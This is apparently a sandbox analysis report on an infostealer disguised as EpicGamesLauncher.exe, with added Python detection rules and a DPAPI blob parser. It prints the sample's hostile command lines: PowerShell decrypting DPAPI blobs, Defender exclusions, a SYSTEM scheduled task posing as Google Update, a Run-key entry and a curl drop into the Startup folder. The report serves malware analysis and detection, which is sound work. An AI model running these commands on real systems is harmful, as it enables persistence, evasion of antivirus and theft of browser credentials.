Analysis

  • max time kernel
    90s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/01/2024, 18:28

General

  • Target

    EpicGamesLauncher.exe

  • Size

    154.9MB

  • MD5

    928282456673e0a194360f9d411f165d

  • SHA1

    9820bd055f95d157fdbdc973bfc955c282a18c29

  • SHA256

    5088d3e4c0b15af2cdd00ab98ca1cdd273cce489b7ac610d4ddda1f1f8154b82

  • SHA512

    c71623dd5396c89bf3d163451cb0c47d26181d4e4136c041cc888c78ef770d944a64c505efdbbe94bd09456c5b072845f98d3e5b3bcf68075cacb6bd1dfc1753

  • SSDEEP

    1572864:HCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:nDAgZi

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
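
The signatures above correspond to a handful of command-line shapes in this report's process tree: a PowerShell ProtectedData::Unprotect call fed an inline [byte[]] literal, Add-MpPreference exclusions, a scheduled task running cscript out of %APPDATA% as SYSTEM under a Google Update-style name, a reg add to the HKCU Run key, and a curl download into the Startup folder (where the URL is still the unfilled template placeholder YOUR-DIRECT-DOWNLOAD-HERE, exactly as the report shows it). The detection logic below is an added example, not part of the tria.ge report or of the sample: the record layout, the rule names and the lineage rule are ours, and the process records are transcribed from this report's process tree with the DPAPI byte list shortened.

```python
import re
from collections import namedtuple

# Added example, not part of the tria.ge report: command-line detections for the
# behaviours the signatures above describe, run over process records transcribed
# from this report's process tree (PIDs, images and command lines as shown
# there; the record layout and rule names are ours).  Each rule is a narrow
# regex that maps directly onto a Sigma or EDR query condition.

Proc = namedtuple("Proc", "pid ppid image cmdline")

RULES = {
    # PowerShell decrypting a DPAPI blob passed inline as a [byte[]] literal
    "dpapi_unprotect_inline_blob": re.compile(
        r"ProtectedData\]::Unprotect\(\s*\[byte\[\]\]@\(", re.I),
    # Defender exclusion added from the command line
    "defender_exclusion_added": re.compile(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I),
    # task running as SYSTEM whose action is a script host on a file under \Users\
    "schtasks_system_scripthost_userdir": re.compile(
        r"schtasks\s+/create.*?/tr\s+\"?(cscript|wscript|mshta|powershell)"
        r"[^\"]*\\Users\\.*?/RU\s+SYSTEM", re.I),
    # task named like Google Update whose action is not GoogleUpdate.exe
    "schtasks_googleupdate_lookalike": re.compile(
        r"schtasks\s+/create.*?/tn\s+\"?GoogleUpdateTask(?!.*GoogleUpdate\.exe)", re.I),
    # Run key value written with reg.exe (reg delete / reg query do not match)
    "run_key_added": re.compile(
        r"\breg(\.exe)?\s+add\s+\"?HK(CU|LM)\\Software\\Microsoft\\Windows"
        r"\\CurrentVersion\\Run\b", re.I),
    # curl writing its download into the per-user Startup folder
    "curl_drop_into_startup_folder": re.compile(
        r"\bcurl(\.exe)?\s+.*-o\s+\"?[^\"]*\\Start Menu\\Programs\\Startup\\", re.I),
}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

def ancestors(proc, by_pid):
    """Yield parent, grandparent, ... of proc (stops at unlinked or cyclic PIDs)."""
    seen, cur = {proc.pid}, proc
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        yield cur

def detect(records):
    """Return {pid: sorted rule names} for every record tripping at least one rule."""
    by_pid = {p.pid: p for p in records}
    hits = {}
    for p in records:
        labels = {name for name, rx in RULES.items() if rx.search(p.cmdline)}
        # lineage rule: anything descended from an executable run out of %TEMP%
        if any(TEMP_DIR.search(a.image) for a in ancestors(p, by_pid)):
            labels.add("spawned_under_temp_dropper")
        if labels:
            hits[p.pid] = sorted(labels)
    return hits

# Records transcribed from the process tree; ppid None where the report shows no parent.
T = r"C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"
R = r"C:\Users\Admin\AppData\Roaming\EpicGamesLauncher"
CMD = r"C:\Windows\system32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STARTUP = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# byte list cut to its first 8 bytes here; the rule keys on the call shape, not the bytes
DPAPI_PS = ("powershell.exe Add-Type -AssemblyName System.Security; [System.Security."
            "Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223), "
            "$null, 'CurrentUser')")
SCHTASKS = ('schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo '
            + R + r'\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM')
RECORDS = [
    Proc(4944, None, T, '"' + T + '"'),
    Proc(2600, 4944, CMD, CMD + ' /d /s /c "' + DPAPI_PS + '"'),
    Proc(4632, 2600, PS, DPAPI_PS),
    Proc(2672, 4944, CMD, CMD + ' /d /s /c "' + SCHTASKS + '"'),
    Proc(4340, None, r"C:\Windows\system32\schtasks.exe", SCHTASKS),
    Proc(4504, 4944, CMD, CMD + ' /d /s /c "cscript //B //nologo "' + R + r'\RunBatHidden.vbs""'),
    Proc(3288, 4504, r"C:\Windows\system32\cscript.exe", 'cscript //B //nologo "' + R + r'\RunBatHidden.vbs"'),
    Proc(2464, 3288, CMD, CMD + ' /c ""' + R + r'\CheckEpicGamesLauncher.bat" "'),
    Proc(2764, 2464, r"C:\Windows\system32\reg.exe",
         r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher" /t REG_SZ /d "' + T + '" /f'),
    Proc(1456, 2464, PS, r'powershell -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"'),
    Proc(1220, 2464, PS, 'powershell -Command "Add-MpPreference -ExclusionPath "' + STARTUP + r'\exemple.exe""'),
    Proc(3684, 2464, r"C:\Windows\system32\reg.exe",
         r'reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher"'),
    Proc(224, 2464, r"C:\Windows\system32\curl.exe",
         'curl -o "' + STARTUP + r'\exemple.exe" YOUR-DIRECT-DOWNLOAD-HERE'),
]

if __name__ == "__main__":
    for pid, labels in sorted(detect(RECORDS).items()):
        print(pid, ", ".join(labels))
```

Two things worth noting when turning this into a production rule. The schtasks.exe process (PID 4340) is shown in the report without a parent, so the lineage rule cannot tie it back to the dropper; the two command-line rules still catch it on their own, which is why persistence rules should not rely on parent-child links alone. And the Run key rule deliberately matches only reg add, so the earlier reg delete of the same value (PID 4792) and the reg query (PID 3684) stay quiet, even though the report's generic "Modifies registry key" signature fires on the query as well.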

Processes

  • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4944
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1248
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f
        3⤵
          PID:4792
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4960
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4468
    • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1792 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
      PID:3168
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2672
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4504
      • C:\Windows\system32\cscript.exe
        cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2464
          • C:\Windows\system32\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" /f
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2764
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe""
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1220
          • C:\Windows\system32\reg.exe
            reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher"
            5⤵
            • Modifies registry key
            PID:3684
          • C:\Windows\system32\curl.exe
            curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe" YOUR-DIRECT-DOWNLOAD-HERE
            5⤵
            PID:224
    • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
      2⤵
      PID:4996
  • C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    1⤵
    • Creates scheduled task(s)
    PID:4340
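
The two PowerShell invocations above (PIDs 4632 and 4468) pass DPAPI blobs inline as [byte[]] literals and call ProtectedData::Unprotect in the CurrentUser scope, so the blobs are fully visible in the logged command line. The parser below is an added example, not code from the report or from the sample: it walks the public DPAPI blob layout (version, provider GUID, master key GUID, flags, description, cipher and hash ALG_IDs, salt, HMAC key, ciphertext, signature) so the header fields can be read without the user's master key. Field names are ours; the two byte lists are copied verbatim from the command lines above and split at field boundaries.

```python
import re
import struct
import uuid

# Added example, not part of the tria.ge report: a parser for the on-disk DPAPI
# blob layout (what CryptProtectData writes and ProtectedData.Unprotect reads),
# applied to the two [byte[]] literals the sample hands to PowerShell above.
# Only the data field is encrypted; everything else is readable as-is.

DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES", 0x800E: "CALG_SHA_512",
             0x800C: "CALG_SHA_256", 0x8004: "CALG_SHA1"}

def blob_from_ps_literal(text):
    """Bytes of a PowerShell [byte[]]@(1,2,...) literal, or of a bare
    comma-separated decimal list pasted from a logged command line."""
    m = re.search(r"\[byte\[\]\]@\(([\d,\s]+)\)", text)
    body = m.group(1) if m else text
    return bytes(int(n) for n in body.split(","))

def parse_dpapi_blob(blob):
    """Walk a DPAPI blob and return its fields; raises on a malformed blob."""
    off = 0
    def u32():
        nonlocal off
        (v,) = struct.unpack_from("<I", blob, off)
        off += 4
        return v
    def guid():
        nonlocal off
        g = uuid.UUID(bytes_le=blob[off:off + 16])
        off += 16
        return g
    def counted():                      # DWORD length followed by that many bytes
        nonlocal off
        n = u32()
        chunk = blob[off:off + n]
        if len(chunk) != n:
            raise ValueError("truncated blob")
        off += n
        return chunk
    b = {"version": u32(), "provider": guid()}
    if b["provider"] != DPAPI_PROVIDER:
        raise ValueError("provider GUID is not the DPAPI provider")
    b["mk_version"] = u32()
    b["master_key"] = guid()            # names the master key file needed to decrypt
    b["flags"] = u32()
    b["description"] = counted().decode("utf-16-le").rstrip("\x00")
    alg = u32()
    b["alg_crypt"] = ALG_NAMES.get(alg, hex(alg))
    b["crypt_bits"] = u32()
    b["salt"] = counted()
    b["hmac_key"] = counted()           # length 0 in current blobs
    alg = u32()
    b["alg_hash"] = ALG_NAMES.get(alg, hex(alg))
    b["hash_bits"] = u32()
    b["hmac2_key"] = counted()
    b["data"] = counted()               # the ciphertext
    b["sign"] = counted()               # HMAC over the blob
    if off != len(blob):
        raise ValueError("%d trailing bytes" % (len(blob) - off))
    return b

# The two literals from the process tree above, copied verbatim and split by field.
BLOB_1 = (
    "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,"   # version, provider, mk version
    "93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,"   # master key GUID, flags, description
    "16,102,0,0,0,1,0,0,32,0,0,0,"                                                  # alg_crypt, bits, salt length
    "192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,"
    "0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,"                                          # hmac key len, alg_hash, bits, hmac2 len
    "202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,"
    "48,0,0,0,"
    "124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,"
    "64,0,0,0,"
    "214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37")
BLOB_2 = (
    "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,"
    "93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,"
    "16,102,0,0,0,1,0,0,32,0,0,0,"
    "147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,"
    "0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,"
    "65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,"
    "48,0,0,0,"
    "93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,"
    "64,0,0,0,"
    "21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135")

if __name__ == "__main__":
    for name, lit in (("blob 1", BLOB_1), ("blob 2", BLOB_2)):
        b = parse_dpapi_blob(blob_from_ps_literal(lit))
        print(name, b["master_key"], repr(b["description"]), b["alg_crypt"],
              b["alg_hash"], "data=%d sign=%d" % (len(b["data"]), len(b["sign"])))
```

What the parse shows: blob 1 carries an empty description and blob 2 the description "Edge"; both name the same master key GUID, use AES-256 with a SHA-512 HMAC, and hold 48 bytes of ciphertext, which under CBC with PKCS#7 padding corresponds to 32 to 47 bytes of plaintext, the size of a wrapped 32-byte key. Together with the "Reads user/profile data of web browsers" signature that is consistent with the DPAPI-protected key Chromium-based browsers keep in their Local State file, but the report does not show the decrypted output, so that identification is an inference, not something the page confirms. Two caveats for a responder: because the sample ran inside the sandbox, these blobs come from the analysis VM's own user profile, and decrypting them offline needs the master key file named by that GUID under %APPDATA%\Microsoft\Protect\<SID>\ plus the user's password or domain backup key; the command line alone is not enough, which is exactly why the sample calls Unprotect in the victim's session instead of exfiltrating the blob.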

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize
    3KB
    MD5
    f48896adf9a23882050cdff97f610a7f
    SHA1
    4c5a610df62834d43f470cae7e851946530e3086
    SHA256
    3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
    SHA512
    16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    1KB
    MD5
    c428399b96e965ae61cee1ba767fd9d9
    SHA1
    8964316b735c23fca792ba85354eacdd8dbb5e35
    SHA256
    14053c0f27a0c695462fad737c6b0c9810dce4472835977e9f08bca3ef0f7462
    SHA512
    5ef32b49b638dca1e5e4adf3c1823a23735c6539d06092e46bdbf97f23b2e4201455ab5e01a019167cd0c80865411ea4fb1e67cc25a3bb58989834a7a34956f7
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    1KB
    MD5
    f0314381ee333795efb86f015c87b7c7
    SHA1
    d70a44581617e6201726846a23fc71b769cc46da
    SHA256
    4f5459942b4bf6f19cd373079bd58e2796c94fd3393f77376170fd39e39e37d1
    SHA512
    56c6074e7e5604e1c76cc147e9d0811195070b01d1979cd620e37bc636a6be3a36f25f3c48ede403f0a4a359b5693ccef9d222a7814fe5cc658c70d732295099
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    944B
    MD5
    353510dff0bdd241051e5b066ea0d884
    SHA1
    a84ea8d61e491d654fa3265cd5fe31bf2737c1c2
    SHA256
    aae6f17564f0d5bb849dfac3faf237f3c6dd5aa2b8adc888d2c2dd6ce58fe33a
    SHA512
    bb6d9c993e93dd816adb0f1ff73a92219823419251acb1cbad626fa8c5070e94b1dd5f1fb77e58bb946e66a2ab4997474fd1a985fb1ba92321def7d8abe4bcd1
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c1lellvw.pfn.ps1
    Filesize
    60B
    MD5
    d17fe0a3f47be24a6453e9ef58c94641
    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\a3f723c4-926a-4e06-bd51-fbce19d82b52.tmp.node
    Filesize
    1.8MB
    MD5
    3072b68e3c226aff39e6782d025f25a8
    SHA1
    cf559196d74fa490ac8ce192db222c9f5c5a006a
    SHA256
    7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
    SHA512
    61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
  • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat
    Filesize
    1KB
    MD5
    c18c10cb23ca6e5490be6eb2fb1a1ddc
    SHA1
    4a3082ddd4851da7db0b8527c31b2ba23877c011
    SHA256
    a58332b95f300a9b5d1309bfc18e5b97b59c1b94145064aeedaf6e9718022b9d
    SHA512
    537462aebe04acd652f310c684b2b562d72665f2b379b830ff15f069603f3ff0229ea65504f0e53f3cb983eeae1de01c4c0518281fe31cef5a890eecc4e2b1bb
  • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs
    Filesize
    167B
    MD5
    323e6511a0f7e82c511ea954d1530b13
    SHA1
    8b167e573b0663d1bc5a60f0d7b3f267f0bc1a20
    SHA256
    48a92c93fb07c8f059e0622ce2a95e32726d02fcb23f7bfb384374e636518597
    SHA512
    757163f84f9352bef973c6a7a994dc4a8492d224820ca5c86e572ed67b3bbe6049444d2a07b08c9efd4bb59b9e5e52ba3fdd397f01f55ddfcf3a5ae3d07ebf6a
  • memory/1220-84-0x00000276666C0000-0x00000276666D0000-memory.dmp
    Filesize
    64KB
  • memory/1220-83-0x00000276666C0000-0x00000276666D0000-memory.dmp
    Filesize
    64KB
  • memory/1220-82-0x00007FF906850000-0x00007FF907311000-memory.dmp
    Filesize
    10.8MB
  • memory/1220-86-0x00007FF906850000-0x00007FF907311000-memory.dmp
    Filesize
    10.8MB
  • memory/1456-71-0x00007FF906850000-0x00007FF907311000-memory.dmp
    Filesize
    10.8MB
  • memory/1456-68-0x0000025A2DA40000-0x0000025A2DA50000-memory.dmp
    Filesize
    64KB
  • memory/1456-69-0x0000025A2DA40000-0x0000025A2DA50000-memory.dmp
    Filesize
    64KB
